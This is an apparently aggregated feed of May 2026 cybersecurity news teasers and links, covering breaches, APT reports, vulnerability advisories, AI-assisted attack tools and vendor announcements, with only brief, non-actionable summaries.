Check Point Software has launched Agentic Exposure Validation (AEV), a new AI-driven capability within its Exposure Management platform that uses autonomous agents to reason like attackers and provide security teams with hard evidence of what is genuinely exploitable in their environment, before adversaries can act on it. The launch comes as the threat landscape undergoes […]
The post Check Point Launches AI Agents That Think Like Attackers as Autonomous Exploitation Reaches Critical Threat Level appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/05/28/check-point-launches-ai-agents-that-think-like-attackers-as-autonomous-exploitation-reaches-critical-threat-level/?utm_source=rss&utm_medium=rss&utm_campaign=check-point-launches-ai-agents-that-think-like-attackers-as-autonomous-exploitation-reaches-critical-threat-level
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Proton Mail Lets Users Send and Receive Gmail Directly Without Giving Google Access to Proton Inbox
Swiss privacy company Proton has rolled out a significant update to Proton Mail that allows users to connect their Gmail accounts directly to the platform. The feature, announced on 28 May 2026, enables Gmail messages to be imported into Proton Mail and allows users to send and receive emails from their Gmail address, all without […]
The post Proton Mail Lets Users Send and Receive Gmail Directly Without Giving Google Access to Proton Inbox appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/05/28/proton-mail-lets-users-send-and-receive-gmail-directly-without-giving-google-access-to-proton-inbox/?utm_source=rss&utm_medium=rss&utm_campaign=proton-mail-lets-users-send-and-receive-gmail-directly-without-giving-google-access-to-proton-inbox
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
2026 World Cup: Discussing The World's Biggest Game's Attack Surface
The 2026 World Cup presents major cyber risks from ransomware groups, state-aligned actors, and other groups targeting critical infrastructure. Learn more here.
The post 2026 World Cup: Discussing The World's Biggest Game's Attack Surface appeared first on Unit 42.
https://unit42.paloaltonetworks.com/fifa-world-cup-attack-surface/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ESET APT Activity Report Q4 2025–Q1 2026
An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2025 and Q1 2026
https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q4-2025-q1-2026/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Kemper - 269,299 breached accounts
In April 2026, the American insurance holding company Kemper Corporation was named by the ShinyHunters ransomware group in a "pay or leak" extortion campaign. The attackers allegedly accessed Kemper's Salesforce environment via social engineering as part of a broader campaign targeting hundreds of organisations using the same method. The group later published tens of gigabytes of data they claimed included internal directory data, Salesforce records and Stripe payment logs. Among the 269k unique email addresses were names, phone numbers, physical addresses and partial payment card data including the last 4 digits, expiry dates and card brands. Kemper confirmed the incident and stated they had engaged third-party cybersecurity experts and notified law enforcement.
https://haveibeenpwned.com/Breach/Kemper
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Pirates in the crosshairs: how one cybercrime gang has been infecting book, movie, and TV show fans for years
Our experts continue to track attacks targeting consumers of pirated content, both books and movies. 2026 saw the discovery of new target sites with tens of millions of visitors, while the miner gained a RAT module.
https://securelist.com/video-books-pirates-miners-rat/119943/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Top 6 Claude Security Risks to Watch as AI Becomes Your Employees' Operating System
Originally published by Akto.
If there's one product that has quietly embedded itself into how your employees actually work, it's Claude.
Two years ago, it was summarizing meetings. Today, it's reading local files, running shell commands, browsing the web with employee session cookies, and connecting to your Slack, GitHub, and production databases. What started as a productivity shortcut now operates with the same privileges as the person using it, and in many organizations, s...
https://cloudsecurityalliance.org/articles/top-6-claude-security-risks-to-watch-as-ai-becomes-your-employees-operating-system
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Top Cloud Cost Optimization Techniques in 2026 for Maximum ROI
As cloud adoption continues to accelerate, organizations are spending more than ever on infrastructure, storage, and services. In 2026, businesses are projected to invest over trillion in cloud computing, yet studies suggest that up to 35% of this spend is wasted due to over-provisioning, idle resources, and inefficient practices. The challenge is clear: how can organizations maximize value from their cloud investments while controlling costs?
With the right approach, from dynamicall...
https://cloudsecurityalliance.org/articles/top-cloud-cost-optimization-techniques-in-2026-for-maximum-roi
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The HIPAA Security Rule Is About to Change: What Healthcare CISOs Need to Do Before the Final Rule Drops
For the first time in more than twenty years, the HIPAA Security Rule is getting a serious overhaul. On December 27, 2024, the U.S. Department of Health & Human Services (HHS) Office for Civil Rights (OCR) issued a Notice of Proposed Rulemaking that would fundamentally reshape how covered entities and business associates are expected to secure electronic protected health information. The public comment period closed in March 2025, and OCR received more than 4,700 comments.
Here's the...
https://cloudsecurityalliance.org/articles/the-hipaa-security-rule-is-about-to-change-what-healthcare-cisos-need-to-do-before-the-final-rule-drops
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Your Security Tools Are the Target Now: Why Detection-First Architectures Are Failing Against AI-Driven and Zero-Day Exploits
Your endpoint detection tooling can no longer be your last line of defense. For attackers, it is the first thing they target and impact.
ESET researchers catalogued nearly 90 EDR killers actively used in ransomware intrusions right now. The attack sequence is consistent: get in, blind or bypass the security tool, then run the encryptor. Detection never fires because it can no longer see what is happening.
Two Linux kernel vulnerabilities disclosed this month show exactly how attackers g...
https://cloudsecurityalliance.org/articles/your-security-tools-are-the-target-now-why-detection-first-architectures-are-failing-against-ai-driven-and-zero-day-exploits
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Out of the Crypt: The Evolving Cyber Extortion Economy
Unit 42 explores trends in data theft and extortion, outlining key strategies for organizations as frontier AI models advance.
The post Out of the Crypt: The Evolving Cyber Extortion Economy appeared first on Unit 42.
https://unit42.paloaltonetworks.com/cyber-extortion-economy/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The AI Phishing Revolution: From Spray-and-Pray to Autonomous Operations
Evolution of AI Phishing As with most cyber threats, AI has created a fundamental shift in the phishing threat landscape. It has become a precision operation powered by AI systems that research, build, deliver, and adapt campaigns autonomously. AI acts as a force multiplier: it scales targeted techniques that previously required experience and time, while […]
The post The AI Phishing Revolution: From Spray-and-Pray to Autonomous Operations appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/05/27/the-ai-phishing-revolution-from-spray-and-pray-to-autonomous-operations/?utm_source=rss&utm_medium=rss&utm_campaign=the-ai-phishing-revolution-from-spray-and-pray-to-autonomous-operations
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI Is Making Software Autonomous, and Governance Must Follow
In 2011, Marc Andreessen famously wrote that "software is eating the world." Today, software is no longer just a competitive advantage; it is the foundational infrastructure for nearly every industry. We don't merely use software — it is essential to the survival of the modern enterprise.
https://www.sonatype.com/blog/ai-is-making-software-autonomous-and-governance-must-follow
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ransom & Dark Web Issues Week 4, May 2026
ASEC Blog publishes Ransom & Dark Web Issues Week 4, May 2026 Customer Data of Japanese Educational Franchise Sold on BreachForums by Hasan Data from Japanese Government Agency for National Civil Servant Personnel Administration Sold on BreachForums by Hasan FBI Issues Warning Regarding Fraudulent FIFA Websites Ahead of 2026 FIFA […]
https://asec.ahnlab.com/en/93881/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The proliferation and evolution of AI-powered hacking tools – how generative AI has changed the cyber attack ecosystem and response strategies
WormGPT, which emerged in June 2023, has brought a paradigm shift to the cybercrime ecosystem. generative AI has lowered the barrier to entry for attacks, and AI-powered hacking tools are rapidly proliferating in both paid subscription services and free open source. furthermore, AI is evolving beyond the creation of attack tools to the management of […]
https://asec.ahnlab.com/en/93875/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Football Fever Fuels Scam Campaigns Across Email and Social Media
Football fans are increasingly targeted by scams exploiting club loyalty, national teams, football collectibles, streaming demand, and the growing excitement around the FIFA World Cup 2026, according to Bitdefender Labs.
Our most recent investigation uncovered more than 55 football-related malvertising campaigns targeting users through fake online stores, social media ads, IPTV piracy operations, fraudulent football apps, and FIFA-themed giveaway and lottery scams distributed through email.
K
https://www.bitdefender.com/en-us/blog/labs/football-fever-fuels-scam-campaigns-across-email-and-social-media
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Designing secure access with ZTNA
New guidance explains how to design Zero Trust Network Access architectures aligned with zero trust principles and not built on old trust assumptions.
https://www.ncsc.gov.uk/blogs/designing-secure-access-with-ztna
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What to consider before asking an AI chatbot for health advice
Using chatbots for medical advice could elicit hallucinations and even expose you to security and privacy risks. Here's what's at stake and how to stay safe.
https://www.welivesecurity.com/en/privacy/what-consider-asking-ai-chatbot-health-advice/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Proofpoint Introduces Active Exploits Protection to Help Organizations Prioritize Vulnerability Patching for Real-World Attacks in the AI Era
https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-introduces-active-exploits-protection-help-organizations
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SSH Labs
SSH is a widely used protocol that provides secure access to remote systems. It enables encrypted communication, file transfers, command execution and shell access for system administration.
Visit https://sshlabs.compass-security.training to learn more about SSH security.
https://blog.compass-security.com/2026/05/ssh-labs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Mytheresa - 84,108 breached accounts
In April 2026, the luxury fashion e-commerce platform Mytheresa was listed as a victim of the ShinyHunters "pay or leak" extortion group. After the ransom deadline passed, the group publicly released the data which contained 84k unique email addresses. The exposed data also included names, phone numbers, physical addresses, purchases and partial credit card data including card type, last 4 digits and expiry date.
https://haveibeenpwned.com/Breach/Mytheresa
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ameriprise - 502,597 breached accounts
In March 2026, the financial services firm Ameriprise Financial was named by the ShinyHunters group in a "pay or leak" extortion campaign. The group claimed possession of more than 200GB of compressed data exfiltrated from Ameriprise's Salesforce environment and internal SharePoint infrastructure, and subsequently published the data after negotiations allegedly failed. The published data contained 500k unique email addresses as well as names, phone numbers, physical addresses and employer information. In their disclosure to state attorneys general, Ameriprise reported 47,876 affected people; the larger email address population represents contacts from Ameriprise's broader operational systems, including internal staff. Ameriprise further advised that they have "implemented heightened monitoring...
https://haveibeenpwned.com/Breach/Ameriprise
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Don't trust ‘secure mail'! malicious Files Impersonating Credit Card Companies Are Being Distributed
ahnLab recently confirmed the distribution of malicious files disguised as security emails from a major credit card company in Korea. this attack has a similar flow to the Kimsuky group’s past malicious LNK distribution case of disguising password files, but it is characterized by a change in the command execution of the initial LNK file. […]
https://asec.ahnlab.com/en/93855/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
cPanel & WHM Authentication Bypass
What is the Vulnerability?
CVE-2026-41940 is a critical authentication bypass vulnerability affecting WebPros cPanel & WHM, DNSOnly, and WP Squared installations. The vulnerability stems from improper handling of CRLF injection during the login and session-loading process, enabling attackers to forge authenticated sessions and gain unauthorized administrative access.
Successful exploitation may allow remote unauthenticated attackers to obtain full administrative control of vulnerable hosting environments, potentially leading to website compromise, credential theft, web shell deployment, malicious configuration changes, and persistent access.
CISA added CVE-2026-41940 to the Known Exploited Vulnerabilities...
https://fortiguard.fortinet.com/threat-signal-report/6447
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability
What is the Attack?
CVE-2026-20182 is a critical authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller and Manager deployments, including on-premises and cloud-managed environments. Cisco confirmed active exploitation in the wild.
Attackers can impersonate trusted SD-WAN peers and establish authenticated control connections, ultimately obtaining high-privileged administrative access. Researchers note similarities to the previously exploited CVE-2026-20127 vulnerability, though Cisco states this is a distinct flaw.
The vulnerability allows unauthenticated remote attackers to bypass device authentication and gain administrative privileges on vulnerable systems. CISA added the flaw...
https://fortiguard.fortinet.com/threat-signal-report/6448
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
BTMOB: A stealthy RAT burrowing deep into Android devices
The malware pairs remote access capabilities with ready-made campaign tools, lowering the barrier for full device compromise
https://www.welivesecurity.com/en/malware/btmob-stealthy-rat-burrowing-deep-android-devices/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Netherlands Seizes 800 Servers, Arrests 2 for Aiding Cyberattacks
Authorities in the Netherlands have arrested the co-owners of two related Internet hosting companies for operating IT infrastructure used by Russia to carry out cyberattacks, influence operations and disinformation campaigns inside the European Union. The two men were the focus of a 2025 KrebsOnSecurity story about how their hosting companies had assumed control over the technical infrastructure of Stark Industries Solutions, an Internet service provider sanctioned last year by the EU as a frequent staging ground for cyber mischief from Russia's intelligence agencies.
https://krebsonsecurity.com/2026/05/netherlands-seizes-800-servers-arrests-2-for-aiding-cyberattacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lawmakers Demand Answers as CISA Tries to Contain Data Leak
Lawmakers in both houses of Congress are demanding answers from the U.S. Cybersecurity & Infrastructure Security Agency (CISA) after KrebsOnSecurity reported this week that a CISA contractor intentionally published AWS GovCloud keys and a vast trove of other agency secrets on a public GitHub account. The inquiry comes as CISA is still struggling to contain the breach and invalidate the leaked credentials.
https://krebsonsecurity.com/2026/05/lawmakers-demand-answers-as-cisa-tries-to-contain-data-leak/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Verizon DBIR: Healthcare Fends Off Increased Social Engineering Attacks
https://www.proofpoint.com/us/newsroom/news/verizon-dbir-healthcare-fends-increased-social-engineering-attacks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Tracking Iranian APT Screening Serpens' 2026 Espionage Campaigns
Unit 42 details Screening Serpens' use of AppDomainManager hijacking and new RAT variants to target tech and defense sectors in recent campaigns.
The post Tracking Iranian APT Screening Serpens' 2026 Espionage Campaigns appeared first on Unit 42.
https://unit42.paloaltonetworks.com/tracking-iran-apt-screening-serpens/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Paved With Intent: ROADtools and Nation-State Tactics in the Cloud
Open-source framework ROADtools is being misused by threat actors for cloud intrusions. Learn how to identify its malicious use.
The post Paved With Intent: ROADtools and Nation-State Tactics in the Cloud appeared first on Unit 42.
https://unit42.paloaltonetworks.com/roadtools-cloud-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload
Cloud Atlas attacks the public sector and diplomatic structures of Russia and Belarus, using ReverseSocks, SSH, and Tor for persistence in infected systems and its new tool, PowerCloud.
https://securelist.com/cloud-atlas-2026/119895/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Foul play: Fake FIFA websites target soccer fans looking for World Cup tickets, merchandise
Watch out for bogus World Cup websites that mimic official ticket and merchandise flows to steal money and personal data
https://www.welivesecurity.com/en/cybersecurity/foul-play-fake-fifa-world-cup-websites-tickets/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Alleged Kimwolf Botmaster ‘Dort' Arrested, Charged in U.S. and Canada
Canadian authorities on Wednesday arrested a 23-year-old Ottawa man on suspicion of building and operating Kimwolf, a fast spreading Internet-of-Things botnet that enslaved millions of devices for use in a series of massive distributed denial-of-service (DDoS) attacks over the past six months. KrebsOnSecurity publicly named the suspect in February 2026 after the accused launched a volley of DDoS, doxing and swatting campaigns against this author and a security researcher. He now faces criminal hacking charges in both Canada and the United States.
https://krebsonsecurity.com/2026/05/alleged-kimwolf-botmaster-dort-arrested-charged-in-u-s-and-canada/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Proofpoint Integrates with the Claude Compliance API to Extend Data Security and Governance to Claude
https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-integrates-claude-compliance-api-extend-data-security-and
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows Privilege Escalation: Bypass UAC
Overview This article delivers a complete, hands-on walkthrough of User Account Control (UAC) bypass techniques against a default-configured Windows 10 host. The walkthrough begins with
The post Windows Privilege Escalation: Bypass UAC appeared first on Hacking Articles.
https://www.hackingarticles.in/windows-privilege-escalation-bypass-uac/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Spread and Evolution of AI-Based Hacking Tools – From Dark Web Distribution to Autonomous Attacks
Key takeaway. since the emergence of WormGPT in June 2023, AI-based hacking tools have spread to the dark web, Telegram, GitHub, and Hugging Face. the market has evolved into a mix of paid subscription SaaS and free open-source distributions. key capabilities have been segmented into phishing automation, malware development, reconnaissance, brute force, vulnerability exploitation, and […]
https://asec.ahnlab.com/en/93816/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
April 2026 Threat Trend Report on APT Attacks (South Korea)
Overview ahnLab utilized its infrastructure to monitor Advanced Persistent Threat (APT) attacks on targets in Korea. this report summarizes the classification, statistics, and features of each type of APT attacks identified in Korea during the month of April 2026. Trends of APT Attacks in South Korea most of the APT attacks identified in Korea were […]
https://asec.ahnlab.com/en/93831/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Missing Security Layer in AI-First Development
https://www.legitsecurity.com/blog/the-missing-security-layer-in-ai-first-development
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
1-15 May 2026 Cyber Attacks Timeline
The threat landscape during May H1 was dominated by cyber crime and characterized by malware attacks, while the exploitation of public-facing applications led the initial access.
https://www.hackmageddon.com/2026/05/21/1-15-may-2026-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Investigation update: GitHub Enterprise Server signing key rotation
GitHub Enterprise Server customers need to take immediate action.
The post Investigation update: GitHub Enterprise Server signing key rotation appeared first on The GitHub Blog.
https://github.blog/security/investigating-unauthorized-access-to-githubs-internal-repositories/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A Detailed Guide on Nmap Firewall Scan
This walkthrough confirms an uncomfortable truth for defenders: flag-based firewall rules age poorly because Nmap supplies enough scan variants to circumvent any single combination. Length-based
The post A Detailed Guide on Nmap Firewall Scan appeared first on Hacking Articles.
https://www.hackingarticles.in/a-detailed-guide-on-nmap-firewall-scan/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Crypto Guest at Dawn Endpoint (Midnight) ransomware analysis
Summary EndPoint is a ransomware variant formerly known as Midnight, which is believed to be built on the Babuk ransomware framework. It targets not only Windows environments, but also ESXi and NAS environments, and uses a double extortion method that combines file encryption with Data exfiltration threats. Overview Since the Babuk source code leak, several […]
https://asec.ahnlab.com/en/93932/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ransom & Dark Web Issues Week 3, May 2026
ASEC Blog publishes Ransom & Dark Web Issues Week 3, May 2026 Nova Ransomware Attack on South Korean Cosmetics and Chemical Firm CoinbaseCartel, Data Leak Claim Against Open-Source Visualization Platform TeamPCP Claimed Source Code Leak and Sale from Major Developer Platform
https://asec.ahnlab.com/en/93803/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Tracking TamperedChef Clusters via Certificate and Code Reuse
Unit 42 analyzes TamperedChef malware clusters that use trojanized productivity apps and malvertising to deliver stealthy payloads to targets.
The post Tracking TamperedChef Clusters via Certificate and Code Reuse appeared first on Unit 42.
https://unit42.paloaltonetworks.com/tracking-tampered-chef-clusters/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How an image could compromise your Mac: understanding an ExifTool vulnerability (CVE-2026-3102)
We explain how a flaw in ExifTool allows attackers to compromise macOS systems via a malicious image (CVE-2026-3102).
https://securelist.com/exiftool-compromise-mac/119866/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Webworm: New burrowing techniques
ESET researchers describe new tools and techniques that the Webworm APT group recently added to its arsenal
https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
When Apps Expose User Data: 6 Ways Misconfigurations Break Customer Trust
Apps have quickly become part of everyday digital behavior. From photo enhancements to video transformations, users are uploading increasingly personal content, often without a second thought. That trust is implicit. Users assume that the platforms they engage with will handle their data responsibly.
But recent findings tell a different story.
A recent incident revealed that the Android app “Video AI Art Generator & Maker,” exposed over 8 million media files, including nearly 2 mill...
https://cloudsecurityalliance.org/articles/when-apps-expose-user-data-6-ways-misconfigurations-break-customer-trust
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How C-Suite Leaders Are Taming Shadow AI
Whether business leaders are ready or not, AI agents are transforming how companies do business. As recent studies have shown, employees are turning to AI to achieve productivity gains, even if it means doing so outside the IT department's control.
A 2025 Gartner survey found that 69% of organizations suspect or have evidence that employees are using prohibited public GenAI, and Gartner projects that by 2030, more than 40% of enterprises will experience security or compliance incide...
https://cloudsecurityalliance.org/articles/how-c-suite-leaders-are-taming-shadow-ai
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft's MSHTA Legacy Tool Still Powers Malware Campaigns on Windows
Bitdefender security researchers have discovered that attackers continue to exploit Microsoft HTML Application Host (MSHTA), a legacy utility available by default on Windows systems that can execute VBScript and JavaScript from local or remote files.
https://www.bitdefender.com/en-us/blog/labs/microsofts-mshta-legacy-malware-windows
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The quest for greater tech independence
A complete decoupling from US technology is neither realistic nor necessary, but the changing environment does require nations and companies to reassess their relationships and dependencies
https://www.welivesecurity.com/en/cybersecurity/quest-greater-tech-independence/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NetExec for OSCP: AD Pentesting
This walkthrough takes you end-to-end against a Windows Server 2019 domain controller in the ignite.local lab. You start exactly where the exam drops you —
The post NetExec for OSCP: AD Pentesting appeared first on Hacking Articles.
https://www.hackingarticles.in/netexec-for-oscp-ad-pentesting/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CISA Admin Leaked AWS GovCloud Keys on Github
Until this past weekend, a contractor for the Cybersecurity & Infrastructure Security Agency (CISA) maintained a public GitHub repository that exposed credentials to several highly privileged AWS GovCloud accounts and a large number of internal CISA systems. Security experts said the public archive included files detailing how CISA builds, tests and deploys software internally, and that it represents one of the most egregious government data leaks in recent history.
https://krebsonsecurity.com/2026/05/cisa-admin-leaked-aws-govcloud-keys-on-github/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Why Credential and Session Exposure Monitoring Should Be a Baseline Security Practice
Data breaches and ransomware incidents are often discussed as if they begin with a sophisticated…
Why Credential and Session Exposure Monitoring Should Be a Baseline Security Practice on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2026/05/18/why-credential-and-session-exposure-monitoring-should-be-a-baseline-security-practice/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
IT threat evolution in Q1 2026. Mobile statistics
This report contains mobile threat statistics for Q1 2026, along with noteworthy discoveries and quarterly trends: new versions of SparkCat and Triada.
https://securelist.com/malware-report-q1-2026-mobile-statistics/119819/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
IT threat evolution in Q1 2026. Non-mobile statistics
The report presents key trends and statistics on malware that targeted personal computers running Windows and macOS, as well as Internet of Things (IoT) devices, during Q1 2026.
https://securelist.com/malware-report-q1-2026-pc-iot-statistics/119828/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
RaccoonLine Publishes Analysis of VPN Data Disclosure Risks and the Shift Toward Decentralized Routing
Rome, Italy, 15th May 2026, CyberNewswire
RaccoonLine Publishes Analysis of VPN Data Disclosure Risks and the Shift Toward Decentralized Routing on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2026/05/15/raccoonline-publishes-analysis-of-vpn-data-disclosure-risks-and-the-shift-toward-decentralized-routing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Raising the bar: Quality, shared responsibility, and the future of GitHub's bug bounty program
We're updating our bug bounty program standards to prioritize quality submissions, clarify shared responsibility boundaries, and evolve how we reward low-risk findings.
The post Raising the bar: Quality, shared responsibility, and the future of GitHub’s bug bounty program appeared first on The GitHub Blog.
https://github.blog/security/raising-the-bar-quality-shared-responsibility-and-the-future-of-githubs-bug-bounty-program/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Thinking carefully before adopting agentic AI
When it comes to using agentic AI, make sure you can walk before you run.
https://www.ncsc.gov.uk/blogs/thinking-carefully-before-adopting-agentic-ai
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Why geopolitical turmoil is a gift for scammers, and how to stay safe
Conflict is a boon for opportunistic fraudsters. Look out for their ploys.
https://www.welivesecurity.com/en/scams/geopolitical-turmoil-gift-scammers-how-stay-safe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Kimsuky targets organizations with PebbleDash-based tools
Kaspersky researchers analyze a range of new PebbleDash-based tools used in recent Kimsuky campaigns and reveal their connection to the AppleSeed malware cluster.
https://securelist.com/kimsuky-appleseed-pebbledash-campaigns/119785/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
April 2026 Cyber Attacks Statistics
In April 2026, Cyber Crime continued to lead the Motivations, once again ahead of Cyber Espionage. Cyber Warfare took the third place, ahead of Hacktivism.
https://www.hackmageddon.com/2026/05/14/april-2026-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
RaccoonLine Shares Technical Overview of VLESS Protocol in New Engineering Explainer
Rome, Italy, 13th May 2026, CyberNewswire
RaccoonLine Shares Technical Overview of VLESS Protocol in New Engineering Explainer on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2026/05/13/raccoonline-shares-technical-overview-of-vless-protocol-in-new-engineering-explainer/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Linux Kernel Vulnerability copy.fail - CVE-2026-31431
CVSSv3 Score:
7.8
CVE-2026-31431In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.
Revised on 2026-05-13 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-26-139
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A 0-click exploit chain for the Pixel 10: When a Door Closes, a Window Opens
We recently published an exploit chain for the Google Pixel 9 that demonstrated it was possible to go from a zero-click context to root on Android in just two exploits. The Dolby 0-click vulnerability existed across all of Android, until it was patched in January 2026. While we had an exploit chain for the Pixel 9, we wanted to see if it was possible to write a similar exploit chain for Pixel 10. Updating the Dolby Exploit Altering our exploit for CVE-2025-54957 was fairly straightforward. The majority of needed changes involved updating offsets calculated for the specific version of the library we targeted on the Pixel 9 to similar offsets in the library for Pixel 10. The only challenge (outside of wishing we'd better documented which syncframes contained offsets) was that the Pixel 10...
https://projectzero.google/2026/05/pixel-10-exploit.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Proofpoint Launches Dedicated MSP Business Unit and Introduces 365 Total Protection for North America
https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-launches-dedicated-msp-business-unit-and-introduces-365-total
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Patch Tuesday, May 2026 Edition
Artificial intelligence platforms may be just as susceptible to social engineering as human beings, but they are proving remarkably good at finding security vulnerabilities in human-made computer code. That reality is on full display this month with some of the more widely-used software makers -- including Apple, Google, Microsoft, Mozilla and Oracle -- fixing near record volumes of security bugs, and/or quickening the tempo of their patch releases.
https://krebsonsecurity.com/2026/05/patch-tuesday-may-2026-edition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Arbitrary log file read in administrative interface
CVSSv3 Score:
4.0
An Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability [CWE-88] in FortiDeceptor WEB UI may allow an authenticated attacker with at least read-only admin permission to read log files via HTTP crafted requests.
Revised on 2026-05-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-26-138
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Command injection in CLI
CVSSv3 Score:
6.1
An improper neutralization of special elements used in an OS command ("OS Command Injection") vulnerability [CWE-78] in FortiAP, FortiAP-U & FortiAP-W2 CLI may allow an authenticated privileged attacker to execute unauthorized code or commands via crafted CLI requests.
Revised on 2026-05-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-26-131
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DoS due to unsafe function in signal handler
CVSSv3 Score:
5.2
A use of potentially Dangerous Function vulnerability [CWE-676] in FortiAnalyzer and FortiManager API may allow an authenticated attacker to cause a system hang via multiple specially crafted HTTP requests causing crashes. This happens if internal locks are aligned, which is out of control of the attacker.
Revised on 2026-05-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-26-137
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lyrie.ai Joins First Batch of Anthropic's Cyber Verification Program
Dubai, UAE, 11th May 2026, CyberNewswire
Lyrie.ai Joins First Batch of Anthropic's Cyber Verification Program on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2026/05/11/lyrie-ai-joins-first-batch-of-anthropics-cyber-verification-program/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
10 questions to ask when using AI models to find vulnerabilities
Using Artificial Intelligence to find vulnerabilities can bring added security considerations.
https://www.ncsc.gov.uk/blogs/10-questions-ask-using-ai-models-find-vulnerabilities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Introducing RAPTR
I'm happy to announce that we are releasing the beta version of RAPTR, a fully open source, API driven collaboration platform built specifically for red and purple team engagements.
https://blog.compass-security.com/2026/05/introducing-raptr/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The spy who logged me in.
https://www.proofpoint.com/us/newsroom/news/spy-who-logged-me
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
16-30 April 2026 Cyber Attacks Timeline
In the second timeline of April 2026 I collected 108 events, corresponding to an average of 7.2 events per day, a number that confirms a growing trend, driven by the increasing number of supply chain attacks, compared to the previous timeline, where I collected 94 events (6.27 events/day).
